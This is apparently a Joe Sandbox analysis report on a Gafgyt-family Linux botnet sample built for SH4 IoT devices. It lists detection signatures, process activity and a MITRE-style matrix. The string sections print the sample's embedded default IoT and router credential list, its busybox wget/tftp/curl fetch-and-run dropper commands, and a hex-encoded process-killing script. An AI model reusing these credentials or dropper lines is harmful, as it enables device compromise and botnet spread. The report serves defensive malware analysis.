Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
la.bot.sh4.elf

Overview

General Information

Sample name:la.bot.sh4.elf
Analysis ID:1543058
MD5:b8a467a9a040b74efc2f3e224030e8db
SHA1:47b5f25953c296e5ec9662bf8c409ba2c5e7d63b
SHA256:dcbcd8d69b04ed426a4d2d8c1ce667bb1db4a9ac5dd80284e3ef00abf78316ec
Tags:elfuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Deletes system log files
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Creates hidden files and/or directories
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1543058
Start date and time:2024-10-27 07:32:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 20s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:la.bot.sh4.elf
Detection:MAL
Classification:mal56.evad.linELF@0/0@0/0
  • Skipping network analysis since amount of network traffic is too extensive
  • VT rate limit hit for: la.bot.sh4.elf
Command:/tmp/la.bot.sh4.elf
PID:6282
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
thIs wEek on xLaB lEarNs nOthinG xd
Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 6244, Parent: 4332)
  • rm (PID: 6244, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.kkU7CiqvTh /tmp/tmp.xQcxDpi09D /tmp/tmp.m2PO41jOJE
  • dash New Fork (PID: 6245, Parent: 4332)
  • cat (PID: 6245, Parent: 4332, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.kkU7CiqvTh
  • dash New Fork (PID: 6246, Parent: 4332)
  • head (PID: 6246, Parent: 4332, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 6247, Parent: 4332)
  • tr (PID: 6247, Parent: 4332, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 6248, Parent: 4332)
  • cut (PID: 6248, Parent: 4332, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 6249, Parent: 4332)
  • cat (PID: 6249, Parent: 4332, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.kkU7CiqvTh
  • dash New Fork (PID: 6250, Parent: 4332)
  • head (PID: 6250, Parent: 4332, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 6251, Parent: 4332)
  • tr (PID: 6251, Parent: 4332, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 6252, Parent: 4332)
  • cut (PID: 6252, Parent: 4332, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 6253, Parent: 4332)
  • rm (PID: 6253, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.kkU7CiqvTh /tmp/tmp.xQcxDpi09D /tmp/tmp.m2PO41jOJE
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: la.bot.sh4.elfReversingLabs: Detection: 31%
Source: la.bot.sh4.elfString: ash|login|wget|curl|tftp|ntpdate|ftp
Source: la.bot.sh4.elfString: l/proc//exe|ash|login|wget|curl|tftp|ntpdate|ftp/lib//lib64//fd/mountinfo/dev/null|/dev/consolesocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin//proc/net/tcp/proc/fd//proc/self/exe/. /proc//dev/watchdog/dev/misc/watchdogtelnetd|udhcpc|ntpclient|boa|httpd|mini_http|watchdog|pppdM
Source: la.bot.sh4.elfString: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4$
Source: /tmp/la.bot.sh4.elf (PID: 6282)Socket: 127.0.0.1:1234Jump to behavior
Source: la.bot.sh4.elfString found in binary or memory: http:///curl.sh
Source: la.bot.sh4.elfString found in binary or memory: http:///wget.sh
Source: Initial sampleString containing 'busybox' found: usage: busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname FICORA
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep
Source: Initial sampleString containing 'busybox' found: usage: busyboxincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > upnp
Source: Initial sampleString containing 'busybox' found: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/la.bot.sh4.elf (PID: 6284)SIGKILL sent: pid: 936, result: successfulJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6364)SIGKILL sent: pid: 6362, result: successfulJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6412)SIGKILL sent: pid: 6410, result: successfulJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6441)SIGKILL sent: pid: 6439, result: successfulJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6468)SIGKILL sent: pid: 6466, result: successfulJump to behavior
Source: classification engineClassification label: mal56.evad.linELF@0/0@0/0

Data Obfuscation

barindex
Source: /tmp/la.bot.sh4.elf (PID: 6285)File: /etc/configJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6285)Directory: /root/.cacheJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6285)Directory: /root/.sshJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6285)Directory: /root/.configJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6285)Directory: /root/.localJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6285)Directory: /tmp/.X11-unixJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6285)Directory: /tmp/.Test-unixJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6285)Directory: /tmp/.font-unixJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6285)Directory: /tmp/.ICE-unixJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6285)Directory: /tmp/.XIM-unixJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6285)Directory: /etc/.javaJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/230/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/110/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/231/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/111/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/232/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/112/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/233/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/113/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/234/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/114/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/235/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/115/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/236/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/116/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/237/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/117/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/118/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/910/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/119/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/912/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/10/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/11/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/918/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/12/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/13/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/14/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/15/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/16/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/17/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/18/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/120/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/121/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/1/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/122/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/243/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/123/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/2/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/124/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/3/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/4/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/125/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/126/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/127/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/6/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/248/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/128/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/249/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/800/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/9/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/801/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/20/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/21/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/22/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/23/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/24/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/25/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/26/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/27/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/28/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/29/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/491/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/250/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/130/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/251/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/252/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/132/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/253/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/254/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/255/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/256/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/257/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/379/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/258/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/259/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/936/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/30/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/35/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/260/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/261/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/141/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/262/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/263/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/264/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/144/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/265/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/266/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/267/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/269/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/270/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/272/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/274/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/278/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/157/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/281/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/286/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/720/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/721/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/847/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/77/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/78/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/79/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/80/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/81/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/82/fdJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6284)File opened: /proc/83/fdJump to behavior
Source: /usr/bin/dash (PID: 6244)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.kkU7CiqvTh /tmp/tmp.xQcxDpi09D /tmp/tmp.m2PO41jOJEJump to behavior
Source: /usr/bin/dash (PID: 6253)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.kkU7CiqvTh /tmp/tmp.xQcxDpi09D /tmp/tmp.m2PO41jOJEJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/la.bot.sh4.elf (PID: 6285)Log files deleted: /var/log/kern.logJump to behavior
Source: /tmp/la.bot.sh4.elf (PID: 6282)Queries kernel information via 'uname': Jump to behavior
Source: la.bot.sh4.elf, 6282.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmp, la.bot.sh4.elf, 6362.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmp, la.bot.sh4.elf, 6364.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmp, la.bot.sh4.elf, 6410.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmp, la.bot.sh4.elf, 6412.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmp, la.bot.sh4.elf, 6439.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmp, la.bot.sh4.elf, 6441.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmp, la.bot.sh4.elf, 6466.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmp, la.bot.sh4.elf, 6468.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
Source: la.bot.sh4.elf, 6282.1.00005565a07e4000.00005565a0847000.rw-.sdmp, la.bot.sh4.elf, 6362.1.00005565a07e4000.00005565a0847000.rw-.sdmp, la.bot.sh4.elf, 6364.1.00005565a07e4000.00005565a0847000.rw-.sdmp, la.bot.sh4.elf, 6410.1.00005565a07e4000.00005565a0847000.rw-.sdmp, la.bot.sh4.elf, 6412.1.00005565a07e4000.00005565a0847000.rw-.sdmp, la.bot.sh4.elf, 6439.1.00005565a07e4000.00005565a0847000.rw-.sdmp, la.bot.sh4.elf, 6441.1.00005565a07e4000.00005565a0847000.rw-.sdmp, la.bot.sh4.elf, 6466.1.00005565a07e4000.00005565a0847000.rw-.sdmp, la.bot.sh4.elf, 6468.1.00005565a07e4000.00005565a0847000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sh4
Source: la.bot.sh4.elf, 6282.1.00005565a07e4000.00005565a0847000.rw-.sdmp, la.bot.sh4.elf, 6362.1.00005565a07e4000.00005565a0847000.rw-.sdmp, la.bot.sh4.elf, 6364.1.00005565a07e4000.00005565a0847000.rw-.sdmp, la.bot.sh4.elf, 6410.1.00005565a07e4000.00005565a0847000.rw-.sdmp, la.bot.sh4.elf, 6412.1.00005565a07e4000.00005565a0847000.rw-.sdmp, la.bot.sh4.elf, 6439.1.00005565a07e4000.00005565a0847000.rw-.sdmp, la.bot.sh4.elf, 6441.1.00005565a07e4000.00005565a0847000.rw-.sdmp, la.bot.sh4.elf, 6466.1.00005565a07e4000.00005565a0847000.rw-.sdmp, la.bot.sh4.elf, 6468.1.00005565a07e4000.00005565a0847000.rw-.sdmpBinary or memory string: eU5!/etc/qemu-binfmt/sh4
Source: la.bot.sh4.elf, 6282.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmp, la.bot.sh4.elf, 6362.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmp, la.bot.sh4.elf, 6364.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmp, la.bot.sh4.elf, 6410.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmp, la.bot.sh4.elf, 6412.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmp, la.bot.sh4.elf, 6439.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmp, la.bot.sh4.elf, 6441.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmp, la.bot.sh4.elf, 6466.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmp, la.bot.sh4.elf, 6468.1.00007ffe3e1f1000.00007ffe3e212000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sh4/tmp/la.bot.sh4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/la.bot.sh4.elf
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
Path Interception1
Hidden Files and Directories
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Indicator Removal
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1543058 Sample: la.bot.sh4.elf Startdate: 27/10/2024 Architecture: LINUX Score: 56 45 Multi AV Scanner detection for submitted file 2->45 8 dash rm la.bot.sh4.elf 2->8         started        10 dash rm 2->10         started        12 dash head 2->12         started        14 7 other processes 2->14 process3 process4 16 la.bot.sh4.elf 8->16         started        19 la.bot.sh4.elf 8->19         started        21 la.bot.sh4.elf 8->21         started        signatures5 41 Sample tries to access files in /etc/config/ (typical for OpenWRT routers) 16->41 43 Deletes system log files 16->43 23 la.bot.sh4.elf 19->23         started        25 la.bot.sh4.elf 19->25         started        27 la.bot.sh4.elf 19->27         started        29 3 other processes 19->29 process6 process7 31 la.bot.sh4.elf 23->31         started        33 la.bot.sh4.elf 25->33         started        35 la.bot.sh4.elf 27->35         started        37 la.bot.sh4.elf 29->37         started        39 la.bot.sh4.elf 29->39         started       
SourceDetectionScannerLabelLink
la.bot.sh4.elf32%ReversingLabsLinux.Backdoor.Gafgyt
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http:///wget.shla.bot.sh4.elffalse
    unknown
    http:///curl.shla.bot.sh4.elffalse
      unknown
      No contacted IP infos
      No context
      No context
      No context
      No context
      No context
      No created / dropped files found
      File type:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
      Entropy (8bit):6.908101999927334
      TrID:
      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
      File name:la.bot.sh4.elf
      File size:66'864 bytes
      MD5:b8a467a9a040b74efc2f3e224030e8db
